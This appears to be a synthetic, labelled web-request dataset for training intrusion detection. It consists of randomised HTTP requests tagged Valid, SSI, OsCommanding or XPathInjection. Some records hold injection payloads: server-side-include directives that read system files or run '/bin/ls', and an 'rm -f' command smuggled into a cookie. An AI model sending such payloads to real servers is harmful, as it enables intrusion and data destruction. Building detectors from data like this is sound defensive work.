User-Agent: Mozilla/5.4 (Machintosh; U; PPC 7.8; ea-fn; rv:2.4.7) Gecko/89950722
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 4371x6437
Via: FTP/1.0 www.t4ofnrp.jpg, FTP/4.3 www.udtw5ort.png, 3.7 www.BboF9dls.css
Transfer-Encoding: ipvwE
Upgrade: a7a59/7.5, fns/4.8, 3c9id/4.9
Warning: 797 57.31.42.175 "ddh8os78iba" "Mon, 22 Aug 05 11:07:24 UTC"
X-Forwarded-For: 171.143.1.2
X-Serial-Number: 73535
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42331
Start - Id: 25711
class: Valid
GET /5coEntqcmpet5m/osbib/i8GwwSjetwixaje/nAfcpa/fT6zQuPKfpaKS@/o0h3Umu.aspx?l4Xgq@lmnXW=15&rreplaceklLwY2=%3Ect HTTP/1.1
Host: www.crtsrkae.it:94
Connection: keep-alive
Accept: application/*, video/*, text/xml
Accept-Charset: x-mac-hebrew, windows-1253, isiri-3342;q=0.7, isiri-3342;q=0.4, gb2312
Accept-Encoding: compress, identity;q=0.5, gzip, gzip, deflate;q=0.0
Accept-Language: *;q=0.3
Cache-Control: max-stale=2434
Client-ip: 97.38.74.39
Cookie: eozi3xffrhuruli=rujxuuV;o9rWe=aR8;sd3enatneoo=tm;senBoicyicf2=y2metah
Cookie2: $Version="458"
Date: Thu, 17 Aug 06 01:52:57 CET
ETag: W/"djUo6Ljud8-mNba7BSm"
Expect: 100-continue
From: iomr@0ty7tRudie.ch
If-Modified-Since: Tue, 15 Jul 08 08:24:48 CET
If-Unmodified-Since: Sat, 13 Jun 09 20:23:17 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2643
MIME-Version: 1.3
Pragma: lyayp8se='trweqa'
Proxy-Authorization: NTLM YWV0SWFlclFSYnJldWUycm95Y3BkSWV0c3J3ZWM5aWZFTGFlZXBqcmh5Y2kwb0g=
Authorization: Basic dHNkbmI6czVoYXFvYW0=
Range: 66951-
Referer: http://Aoyem.be/6toI.sh
TE: trailers,gzip;q=0.4
Trailer: Accept-Charset
User-Agent: 4_ybcyjyB http://www.sNhthops.org
UA-CPU: MIPS
UA-Disp: 7894,3200,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8973x257
Via: 3.4 246.186.64.171
Transfer-Encoding: gzip
Upgrade: ojeiet/9.9, woq/6.0, ttYs/5.7, urTi2/9.1
Warning: 290 www.CltSOC.jpeg "lorOta1roSd" 
X-Forwarded-For: 223.76.39.236
X-Serial-Number: 30259160107930
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25711
Start - Id: 40410
class: SSI
PUT /pohhyenamefs5ScIdE/sfawamueasaa7sn/ttswacosinp/fP/Rgrae8sdthdro4qNssbo/eHjQc-K1RA@EK/eRUK3epogTW/f4b_meSdTZ/i1aZX78K4xR/CoFinputHscriptrcpGOM/LWVB/U5.jsp? HTTP/1.0
Content-Length: 137
Content-Language: 2hoSte,us,e
Content-Encoding: deflate
Content-Location: /ihsh2/lcrEymlc/mom2ew/ei1snn.avi
Content-MD5: cmFuZWtOb2U2bXNpbHRvaA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 04 Jan 08 23:03:49 GMT
Last-Modified: Fri, 15 Sep 06 14:52:15 CET
Host: 47.67.218.42
Connection: Wtio
Accept: video/*;q=0.3, image/*;q=0.9, text/*;q=0.7
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.6, deflate;q=0.2, compress, identity;q=0.0
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 21.209.58.212
Cookie: iFc7drau=qpEenWaaetrtGa;014_BbplikenSQ=exec/1t4c;d;dna;1t6eodr=echoan|k?|creplaceWe?oy;oaErhyrase2=727912654
Cookie2: $Version="3"
Date: Wed, 06 Aug 08 12:31:43 UTC
ETag: W/"5EI0NvigZQ0wYh_Mhu1T"
Expect: tnFAu=roDct
From: rQkb4al@ootSiafmsu.cz
If-Modified-Since: Wed, 24 Mar 10 06:14:35 GMT
If-Unmodified-Since: Mon, 19 Sep 05 06:41:24 UTC
If-Match: *
If-None-Match: "PhNL94ZtW7Zsy-l"
If-Range: Mon, 01 Nov 04 20:23:49 UTC
Max-Forwards: 5
MIME-Version: 9.3
Pragma: 3t='eDaItn7'
Proxy-Authorization: l4te9v tifnO=sIwmcnTg
Authorization: yrMme ovYOa5ur=Arrt
Range: 887-
Referer: http://syEtah.fr/9qwefdsu/usvta/edhn0e.dll
TE: chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: ssclcyeeoe/6.8
UA-CPU: 68000
UA-OS: WinNT
UA-Pixels: 5480x145
Via: lase/1.2 101.198.7.160:99, 5.8 www.fn1jm1nm.jpeg, fe4ci/4.3 www.ree7rqI.png
Transfer-Encoding: deflate
Upgrade: etd2H/3.8, dgEkto/5.6, bri/1.1, rw69/0.0, aheo/6.8
Warning: 324 55.206.31.28:42227 "mlq6npnaa" 
X-Forwarded-For: 55.196.49.158
X-Serial-Number: 139491400709
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Eetbo=50556&uesicLMFd=<!--    #include virtual="d:\windows\autoexec.bat"    -->&la=03pmL9Mme&HalfDsa=nsoaafg8ljzOatgn

End - Id: 40410
Start - Id: 1301
class: Valid
GET /eJP/lnLX/tDP8UL_ja4bMODHAvmLT/6eondeiedsd/nwrtmaredhio.mspx?uaoaon7iesge=At7e&vtupdatedkflib5Cphp3=sm-sQb.OidAJ&lrt34od=eH0iEZ&gtep=eohtyYoowloronc HTTP/1.0
Host: 198.243.154.92
Connection: keep-alive
Accept: audio/*, audio/*, image/gif;q=0.0
Accept-Charset: iso-8859-9;q=0.9, windows-874;q=0.5, iso-8859-9, big5, x-mac-icelandic;q=0.3
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.2
Cache-Control: min-fresh=4831
Client-ip: 169.155.248.146
Cookie: hecertiin=7;seenheh=i@li%1c;V4XW=necfisnsbmstn;glhnopeliEh=718;Ohfrbhneas=0Ehcwyuxpywot;Z5FeXX=41386
Cookie2: $Version="02"
Date: Wed, 13 Sep 06 18:09:05 GMT
ETag: "IYCK@AAcLSv1wIh"
Expect: 100-continue
From: strldbE@9qmhittm.gov
If-Modified-Since: Sun, 28 Nov 04 21:19:21 UTC
If-Unmodified-Since: Sat, 10 May 08 18:11:02 GMT
If-Match: "tyqizW2Ik6lX8lc56"
If-None-Match: *
If-Range: Mon, 24 May 04 04:08:40 CET
Max-Forwards: 2889
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: bomito y1wet=h2n6ru
Authorization: Basic Z1R1djp0cmV0aQ==
Range: 282-,2-77614,032140-
Referer: /nSiyd/0hsewEhh/0utl7t/thinaoE/hsunl.fgf
TE: trailers,trailers
Trailer: Warning
User-Agent: cbFFE.vg6u http://www.froti.de
UA-CPU: PowerPC
UA-Disp: 298,657,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 7486x696
Via: 6.2 1.98.205.50
Transfer-Encoding: stin; aSth6ih=e5eoa9e
Upgrade: a6bv/5.7, 6ktr/0.7
Warning: 222 www.adbe.jpg "ebprbkhtcfatduen" "Mon, 20 Mar 06 12:05:20 UTC"
X-Forwarded-For: 47.248.188.232
X-Serial-Number: 67843918306515180
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1301
Start - Id: 27826
class: Valid
GET /pmdeo/mI3rec/stZrP15PoL3qn82afg/ncrh4ec.msf?ab=haso&Ehhbor1aifahese=852&krsa=nJ.sLqe0DftY&CX6g9i@75=01954&ae=a6Y505lqH&ssm5wt5cvsiIe=diT HTTP/1.0
Host: 14.222.5.182:80
Connection: keep-alive
Accept: text/*;q=0.6
Accept-Charset: *
Accept-Encoding: identity, gzip, compress;q=0.2, identity;q=0.1, deflate;q=0.1
Accept-Language: l1-4lg74;q=0.5, m-chr, cqwteva-tdige
Cache-Control: no-transform
Client-ip: 102.45.50.188
Cookie: TByihNb=1476
Cookie2: $Version="51"
Date: Sat, 05 Jun 04 12:25:01 UTC
ETag: W/"Uqzq_2T@iJjTyO8QE3WH"
Expect: 100-continue
From: xalea@r7nedo.fr
If-Modified-Since: Mon, 26 Jan 09 08:16:23 GMT
If-Unmodified-Since: Tue, 06 Jan 04 12:33:35 CET
If-Match: *
If-None-Match: "NWzEOx6J2frU.S6y"
If-Range: Mon, 17 Oct 05 22:45:35 GMT
Max-Forwards: 21
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: NTLM eWg0MXd0ZXd4YUVzcm5mcnJlbGVlNm53aDR6dDFlZ2VtbA==
Authorization: Basic cnR4cnRscm46RXdSMmFOb2U=
Range: -39341,-175784
Referer: http://Waikm.cz/sohd.pl
TE: gzip,gzip;q=0.1,trailers
Trailer: TE
User-Agent: vsoraep
UA-CPU: x86
UA-Disp: 159,4098,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 370x5547
Via: FTP/2.7 137.231.7.35
Transfer-Encoding: identity
Upgrade: 8oArj/0.3, elhh/1.2, 9oUsf/7.4, bib/0.3
Warning: 228 www.oikad9p.html "n7asOt" 
X-Forwarded-For: 27.223.128.62
X-Serial-Number: 92325368257
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27826
Start - Id: 15219
class: Valid
GET /e6rtmsxenehrtenodfnt.mspx?BitsdtsnOo=%3Ci&sid=8928144&xj3-mUEt=eDa3&includeX9htacces=spxdhrmce&v@i_fs_S=323235&cnnnrIlliz6vaU=660911148&rirT=aeun&ihl=17378&bgsoundphpRCg0af=02875&t0to=wabgrt%7Ct0qneis&ste5hlg=d-UbDCeHeRC HTTP/1.1
Host: 80.230.193.226
Connection: l1tl
Accept: text/*, audio/*;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: gzip;q=0.8, identity, identity;q=0.4, gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 97.133.34.9
Cookie: ain1Fino7Utrp=ttrjvEihbaauss;tao4L=ue8ah;Enhitlw=6;m7=x62yE;FYumhdUbetween5TUO=34452;tbiUTf2eu2031l=82474711
Cookie2: $Version="236"
Date: Mon, 13 Oct 08 07:07:21 CET
ETag: W/"@da@leod86.CYSlI"
Expect: 100-continue
From: Ono9sk1@8ieegshia.com
If-Modified-Since: Sun, 03 Dec 06 21:45:59 CET
If-Unmodified-Since: Mon, 23 Apr 07 07:55:45 UTC
If-Match: "sCGhQb-BUNy40TLAl"
If-None-Match: "d5txQXL5mkslID1P"
If-Range: *
Max-Forwards: 7
MIME-Version: 9.5
Pragma: aoeiIi3i='5lcz'
Proxy-Authorization: NTLM aHRrdU5ldGh0VWF3ZWl0SGdjcnlmckRhZTdnZnRFMzFrb2R5YWxlT3JnZQ==
Authorization: NTLM dHVhMWVranVSdGd2YXJOeG9vd21jbXRqdGF0b29oOGxxbzJu
Range: 8-,6457-,15780-
Referer: http://www.otn5.cz/jtori9e/gsTte/rmaw/Odlyeww9/9bhar7.mpeg
TE: deflate,gzip;q=0.6,trailers
Trailer: From
User-Agent: Mozilla/6.2 (Windows; U; WinNT 7.9; de-ei; rv:1.2.5) Gecko/00148067
UA-CPU: Sparc
UA-Disp: 450,4767,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 1443x630
Via: 0.4 www.i6wpni.htm:91, 3.3 193.64.118.66:0721, 1.4 245.191.169.137
Transfer-Encoding: ivqkdw
Upgrade: jwhdr/3.5, rnh/9.6, ekqpn/9.6, ixea/2.8
Warning: 640 220.2.93.116 "sesbape4s" "Sat, 04 Dec 04 16:33:54 UTC"
X-Forwarded-For: 236.127.123.213
X-Serial-Number: 985452
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 15219
Start - Id: 1015
class: Valid
GET /nhetneapetohh2ievGud/kT8a-O0/ueai9-PPQqx-PsZhB/aheeel/Oufurhhy6bie/aCOcdUcpGVYv8IE_ZnpN/Vn/s@I1QRmMKrhngaJbrMk/zUAl3neeedexd/rimrtet.cgi? HTTP/1.1
Host: 46.171.173.26
Connection: close
Accept: text/html, video/*;q=0.7
Accept-Charset: *;q=0.9
Accept-Encoding: deflate, deflate;q=0.4, identity, gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 54.9.122.101
Cookie: geynaiYsdmss=tntjpeqoortzesghe;s3e=74279992;aee=nN5
Cookie2: $Version="8"
Date: Thu, 12 Nov 09 03:04:27 UTC
ETag: W/"2fNKM6ip3EraUsNKVl"
Expect: 100-continue
From: iyiqd@OJte.cz
If-Modified-Since: Wed, 21 Feb 07 04:26:54 CET
If-Unmodified-Since: Sun, 02 Jul 06 13:42:53 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 20 May 08 12:22:09 CET
Max-Forwards: 52
MIME-Version: 8.6
Pragma: ad8dg=ie4oi
Proxy-Authorization: Basic aXNqdWU6b2hhZWlhc2M=
Authorization: Digest algorithm=MD5
Range: 9-72361,672405-
Referer: http://www.8oMees9l.be/Buss.wmn
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/4.2 (X11; U; Linux i586 7.0; iw-ut; rv:9.6.2) Gecko/56827511
UA-CPU: x86
UA-Disp: 419,762,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 5033x777
Via: 9.7 www.7sEslgr.jpeg:4, 0.5 www.bfljhe7y.gif, FTP/6.2 123.121.14.98
Transfer-Encoding: isre
Upgrade: Rhhtb/3.6, ren/5.0, rt9em/3.6, nixTd/5.6, oeeAEo/3.8
Warning: 066 226.235.175.144 "s4tnneibase" "Tue, 09 Mar 10 24:22:21 GMT"
X-Forwarded-For: 162.75.24.52
X-Serial-Number: 90115734669182651364
----: ------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 1015
Start - Id: 36845
class: OsCommanding
PUT /olodht1cbtTttedahtt/yrHooetnEsseolh.jpg? HTTP/1.1
Content-Length: 309
Content-Encoding: identity
Content-Type: application/x-www-form-urlencoded
Last-Modified: Wed, 14 Jul 04 03:12:02 CET
Host: 195.113.144.26:80
Connection: keep-alive
Accept: image/jpeg;q=0.3, text/xml;q=0.0, image/*
Accept-Charset: iso-8859-8;q=0.3
Accept-Encoding: 
Accept-Language: *
Client-ip: 35.73.137.190
Cookie: cofa2oat960=853954239;7aIhpxaeygmm=42946;sAhkmigenhlpsn1=425;ie7n=rm    -f /tmp/er  |;CCW.ZdlDxmlaccept=raSeebjldnehphp2
Cookie2: $Version="9"
If-None-Match: *
Max-Forwards: 961
MIME-Version: 1.6
Referer: http://patq.it/Uefndana/acfoth/rort.txt
User-Agent: Mozilla/2.6 (X11; U; Linux i386 1.4; e2-vr; rv:2.9.3) Gecko/47582390
UA-Pixels: 281x368
Via: HTTP/4.4 156.103.212.72, 4.0 6.240.98.130

amBNmifgtoA=5&n3iyo1gdE4cne8=ouo~rboNz@mp h)vonhttp&a0=re5X6933hJ&l4ecbehsTWEue= isc&uuancnaIr=haPsnetlweL5hnullStacmdwindow.open&ssnozeier=8H-_L&tgcmhdhta=t5i&ulejAnizoahex=eqrar&ive5=+teP$&I22Zyhsfglp=lC1esQ8craoc&WedNihW=4207367741&s8tracumhnij=7018&tuene9aateo=ildi6oL7&varzopPrBRposition=467774

End - Id: 36845
Start - Id: 30534
class: Valid
GET /gssdngleqiaohe2EmS/tN/aiWOmxgsJD5Z/ntdaeieanitoo/T5ZI@k9hRpositionjbDm.png?uretdnojohyeuue=owqf&fbse=3Vs+&flrtrn=5y&eb1vTOhwnrn=2&nDtre4io=pUgD&d4se=eh&t2oSeb4=hx5Aioreplacezldee4en HTTP/1.1
Host: 56.51.28.101
Connection: close
Accept: */*;q=0.3
Accept-Charset: macintosh
Accept-Encoding: deflate;q=0.8, compress;q=0.2
Accept-Language: Rd-0;q=0.2
Cache-Control: no-transform
Client-ip: 133.1.177.55
Cookie: rOatS=1744232;aFahraegop=h-9vrHqJvCNO
Cookie2: $Version="6"
Date: Wed, 28 Feb 07 07:52:40 UTC
ETag: W/"yuXYFisztBNDVvs812"
Expect: 100-continue
From: bazsaaR@y3h4ig.st
If-Modified-Since: Sun, 05 Feb 06 22:13:03 GMT
If-Unmodified-Since: Fri, 01 May 09 17:04:20 UTC
If-Match: "_tHk6moevXhiDawb@ez"
If-None-Match: "oHAm8DCnkFcEkb_cihbk"
If-Range: "qntiCut6.tm8y7o"
Max-Forwards: 9
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: NTLM cGFseXRkbGE4c3VvYWhpbzVheW1zb0tFaWVlbnh0dHRkcGJlVW10M3QxbGhlZQ==
Authorization: Basic cGNodDowZWFhaWdtZQ==
Range: -47,-9645,79-6262
Referer: /ERotpoj/bvuhi/Ond5e/gyttooa.swf
TE: chunked;q=0.5,gzip;q=0.8
Trailer: If-Modified-Since
User-Agent: Mozilla/3.1 (X11; U; Linux i386 4.0; iE-nd; rv:7.7.2) Gecko/93194807
UA-CPU: 68000
UA-Disp: 8976,710,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 848x9139
Via: 8.8 www.tot1Hrol.gif
Transfer-Encoding: aw6n6C
Upgrade: psezsR/2.5, pzmc/6.5
Warning: 596 www.e1mel8l.shtml "telnrnohrlong" 
X-Forwarded-For: 175.103.25.65
X-Serial-Number: 60141
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 30534
Start - Id: 19196
class: Valid
GET /dulXGkvyGheOKMRSF3Qn.gif?tseetyEus=1&ilthig8eeieh=hsRlvCnAah&b2SSI6VZ=0KK&eermrse0co=281027&wm4endae=%29cjpt&s4zljeu=s0xmlbwoo0anlocationbgsoundie&nodasAI=hCqVhibn5hfzt&tVJrtM=sPSHDxLU&eotaenjDs4m=9621 HTTP/1.0
Host: 27.120.102.63
Connection: adrLeoc
Accept: */*;q=0.1
Accept-Charset: us-ascii;q=0.8, windows-1255
Accept-Encoding: 
Accept-Language: p-a2a;q=0.5, hIhtArJ-cSu3o;q=0.1
Cache-Control: max-age=6
Client-ip: 194.46.12.62
Cookie: lo3elrrn9ir2=Fo;Edrbxsisem=g
Cookie2: $Version="953"
Date: Wed, 25 Jun 08 08:51:11 GMT
ETag: W/"nqeS2aEaHXxMLY2Se"
Expect: 100-continue
From: ToNpsn@tvfalhel.biz
If-Modified-Since: Wed, 02 Apr 08 23:54:57 GMT
If-Unmodified-Since: Sun, 08 Jul 07 13:37:56 CET
If-Match: *
If-None-Match: "2moAAN-giP@lggKgkZM"
If-Range: "NRMcI.WBGMr@WMFo8oDy"
Max-Forwards: 6
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: 5disca arKvDE=rei2o
Authorization: ZdeE xomh=stisBeer
Range: 967604-010774,-548402
Referer: /bs1jtjr/r4pA.dll
TE: trailers,deflate
Trailer: If-Range
User-Agent: Mozilla/2.4 (Windows; U; Windows NT 1.6; l3-ds; rv:7.1.7) Gecko/34776367
UA-CPU: 68000
UA-Disp: 246,582,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 203x411
Via: 6.1 118.102.198.56
Transfer-Encoding: compress
Upgrade: deldgt/6.6
Warning: 189 59.44.75.168 "mazmEztho0mt0svdfi" 
X-Forwarded-For: 241.243.123.217
X-Serial-Number: 1861049652
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19196
Start - Id: 8938
class: Valid
GET /passwdt@WeRfnKpQHNNp/w6hacoeadhsltoktqBer/nfwB2T/rr/0W-Np.png? HTTP/1.1
Host: www.sflaosbto.net
Connection: lt0renev
Accept: text/*;q=0.5
Accept-Charset: euc-cn, iso-2022-jp;q=0.7, windows-1253;q=0.3, euc-kr
Accept-Encoding: compress, identity;q=0.5, gzip, gzip, deflate;q=0.2
Accept-Language: *
Cache-Control: otda3s='Oeit'
Client-ip: 103.145.223.50
Cookie: iiiaae4w6itlnd=747491093;nac=itzwmiix4eTfia1;wmaeddetohndw=n%;imgOvXgZ=23526
Cookie2: $Version="3"
Date: Sat, 23 Jan 10 02:42:30 UTC
ETag: W/"@io_fuBzJNIbIaQQ2i"
Expect: 9osgeiia
From: gyture4e@b1eUnPsa.de
If-Modified-Since: Sun, 16 Nov 08 11:43:21 GMT
If-Unmodified-Since: Sun, 21 Nov 04 11:26:26 GMT
If-Match: "laH_puyhhT8meC@Fi"
If-None-Match: *
If-Range: Sun, 24 Oct 04 17:44:36 CET
Max-Forwards: 621
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Basic cm50Zzc6TmVtYVhsdEQ=
Authorization: Digest cnonce="reolad"
Range: -4608,2019-
Referer: http://WoeXRtg.be/as3toel/vsonee/eosr.txt
TE: trailers,trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/7.3 (X11; U; SunOS sun4u 5.1; lt-r1; rv:8.9.5) Gecko/99578133
UA-CPU: x86
UA-Disp: 4170,137,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 4768x416
Via: 3.9 72.4.56.2, HTTP/3.0 www.btqsaNal.gif:33693, 5.7 www.oeEaioad.jpeg
Transfer-Encoding: vldh; oloi=37ir1
Upgrade: D54Tc/5.2
Warning: 571 130.163.218.71 "0rarimveh" "Tue, 26 Dec 06 12:43:48 GMT"
X-Forwarded-For: 219.111.245.62
X-Serial-Number: 2309739328693476356
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 8938
Start - Id: 40762
class: SSI
PUT /laPn9MswestDSeozn4p.js? HTTP/1.0
Content-Length: 343
Content-Language: ho
Content-Encoding: gzip
Content-Location: http://spff.net/ic5trxea/sal3/tRmiepg.bin
Content-MD5: c0xpaWJlZ2VpbEl1aW9Ocw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 28 Feb 04 12:58:49 CET
Last-Modified: Mon, 29 Jun 09 05:43:41 GMT
Host: 131.126.5.130:80
Connection: close
Accept: video/*, video/*, video/mpeg;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: compress;q=0.6, gzip
Accept-Language: nchp-almU, mdr-gos, eerfncL-6oEj, ieilDch-Oehmg;q=0.1, wne-sieddc4
Cache-Control: max-stale=3
Client-ip: 166.41.33.129
Cookie: ipe9Jm3=112815;NZn=pmeiss;Aeernepfae=tdsbajv2Dd 
Cookie2: $Version="570"
Date: Tue, 30 Mar 04 08:46:25 UTC
ETag: W/"FsK6X9uau3JVBqU"
Expect: rmaeE=isllts;rfnemmn
From: tt33en@1osNNfn.biz
If-Modified-Since: Tue, 11 Dec 07 05:32:55 UTC
If-Unmodified-Since: Mon, 16 Jun 08 06:56:32 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 21 Oct 06 10:13:07 GMT
Max-Forwards: 797
MIME-Version: 8.0
Pragma: a=rwagdaok
Proxy-Authorization: NTLM SW5hcmx0ZTA2Zmk3ZWt0bGUxZW50aHNpaFJvcm5wc2llZWFlZXVkbmF0cWxh
Authorization: Basic elNkbmlyaUk6bmFpdG8=
Range: 21211-
Referer: /smrEe4/denl/eucct/70da/Wgtr.msf
TE: trailers,chunked;q=0.4
Trailer: Connection
User-Agent: Mozilla/6.0 (compatible; Konqueror/4.7; Mac OS X; w3to; 3Llt2tso; oeel)
UA-CPU: 68000
UA-Disp: 442,6070,32
UA-OS: Win98
UA-Color: color16
Via: 3.3 52.26.160.47:7, 8.3 www.icuTqst.shtml, 6.4 www.IbuaLe.css
Transfer-Encoding: compress
Upgrade: wnn/8.4, yu0/9.2
Warning: 515 255.26.146.194 "etiqarDie" 
X-Forwarded-For: 31.100.82.188
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

YvE14inU-window.openO=<!--    #odbc   statement    ="select  v9lbspc,   oieRpW9, IhImwo   from A1vD5t   order by     4,   19,    9" -->&rrovahe=smd6%lmn]]ztntaeinl&mohe=e)t'&uphp.Jr=dLTIsvQ&5xGhYmnosxn=gqy9se&oejDedno5id8=|C9tr[hapntuz&ilppopiangnaait=7&xbody.wp-ZIbKpwgetx=eU.dX2dA9zr&tqn=e.d7&whcahsA='w

End - Id: 40762
Start - Id: 40037
class: SSI
GET /ib9U4gYi/n1a/JJ/Mnode1SM1wmJecho/U2euSnqhasAewhete/aiocttErooweTUre/ruNB8LXf6A9e1i/@Pv310rVb/Headqltt01wCmelaTD3o.pl?ENnSwPn=ga1e&msee8o9hrr=ag+uyhnj-rriyY&ti=a+%24v&JgPvDeitAO-B=Ile&o4we=revala7+tld9xsystemquciti%29%3C&stichd0E=a%2Baets5o&s2esesOm2ukpo=nchaccept&estdinXRy3r=ylAdAnvrZHFZ&vr=367&yalitmomaaod=Itlchw&feas=qeaiu&rmisaetes=nLJm7YrDc&7P27=h%25s&ales=%3C%21--%23exec++cmd%3D%22%2Fbin%2Fls+++++-l+%2Fhome%2Fdno5efishu%2Faae1L8wesx%22+--%3E&h2plkasdinoutti=%7C+ HTTP/1.1
Host: www.dcOooneba.gov
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8-i
Accept-Encoding: identity, gzip;q=0.4, deflate, compress, compress;q=0.1
Accept-Language: 7cmAeet-x;q=0.5, offjss-sqe1o7;q=0.2
Cache-Control: only-if-cached
Client-ip: 160.214.20.200
Cookie: eweecmn5=hLXWoeKlnlSes5tnaE;ppnnbOfrom=sXIAKy27;4aTYJO=wl_o2;sautst=085943;SUbgnotw=r3c9i9aai7l
Cookie2: $Version="532"
Date: Wed, 25 Mar 09 14:35:17 UTC
ETag: "1oi95JajISSvSc6NmwV"
Expect: 100-continue
From: loaa@ioendeSshb.it
If-Modified-Since: Fri, 05 Aug 05 01:08:42 GMT
If-Unmodified-Since: Thu, 25 Oct 07 19:23:18 GMT
If-Match: *
If-None-Match: "JMbjdCFoWIX-OVjrd"
If-Range: "flhmNs9s0HL2MpELUJpe"
Max-Forwards: 67
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Digest username="tsbedo"
Authorization: Basic ZXlubzpFdGll
Range: 41683-1312,-3
Referer: http://priz.ch/gIeamgdt/egynrt.html
TE: deflate;q=0.4,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.4 (Machintosh; U; PPC Mac OS X 7.5; hn-sh; rv:5.3.9) Gecko/09666994
UA-CPU: MIPS
UA-Disp: 704,609,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5394x1347
Via: 1.1 www.ahd42b.css, BIhte/0.9 76.80.83.86:72, HTTP/1.3 www.qiet.tiff
Transfer-Encoding: oretoe
Upgrade: sonW0n/7.4, iecird/0.5, sihan/2.9
Warning: 794 212.70.161.46 "nC7teHarp0di5fna" 
X-Forwarded-For: 117.150.72.121
X-Serial-Number: 36197
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40037
Start - Id: 8694
class: Valid
GET /mfpc_L4qZawSKfRRY40/e1BtesRi1sdhRriNcoex.cfm?geSLm9YLHH=099581&4e6ttnovhgr=r&prpodWEw=tseuitozgbgsound&wshtttt=epRCXuyHOG&hy0z5CSAW4plink=euYHshor%3ETsrT&l5escimmrany=67678&mvar-7mGxz0=l5ecJjesmHnitu6on&qenmn3sNx=dw8dEss%3Cy%25r6rlc&iScisd1tEeeEet=9keegvhmr&49indp5sQeszt=n2beropenstN%3Ewp-d&tamepo0teolzIm=ie9&hgNfdlr=t5ncTHiytc HTTP/1.0
Host: 134.82.50.150
Connection: keep-alive
Accept: image/*;q=0.9, video/*;q=0.9, application/x-tar
Accept-Charset: isiri-3342;q=0.3
Accept-Encoding: *
Accept-Language: qnwI-qw8d
Cache-Control: no-cache
Client-ip: 173.156.22.51
Cookie: ZorMRtmp=sdc;dEl1nnStEA=143657;s-7B=be;ebrrinoelleu=esf3eId;Rocriqtjt=qp;ndsd0dznraik=Leny
Cookie2: $Version="55"
Date: Thu, 09 Apr 09 24:00:27 UTC
ETag: W/"iEY.oi6B6Dsil3ru0"
Expect: 100-continue
From: t9lLnsr@iAtnemrcti.it
If-Modified-Since: Tue, 10 Mar 09 12:58:46 CET
If-Unmodified-Since: Thu, 28 May 09 13:40:02 GMT
If-Match: "Nm1SL8a321nhjIeJ"
If-None-Match: "@K4TF_ksW5R_QilFGb"
If-Range: Sat, 04 Aug 07 24:52:40 UTC
Max-Forwards: 87
MIME-Version: 5.6
Pragma: poefdG='NoEh3'
Proxy-Authorization: iaays9 2e7s=dduas8it
Authorization: th1s a5KoeM=ttbbNtnt
Range: -1251,-8,78356-
Referer: /tojn/zrmer/dh8rss.jpeg
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/4.6 (Windows; U; WinNT 0.7; le-hr; rv:2.1.2) Gecko/60777479
UA-CPU: PowerPC
UA-Disp: 8125,063,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4171x643
Via: 1.1 157.80.207.101:07, HTTP/1.6 7.9.86.65
Transfer-Encoding: identity
Upgrade: 81ihR/9.8, iiess/1.4, hse/9.5
Warning: 642 www.n84b.htm "lyajg" "Mon, 15 Jan 07 21:15:54 UTC"
X-Forwarded-For: 142.15.151.110
X-Serial-Number: 396730650206
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8694
Start - Id: 49626
class: XPathInjection
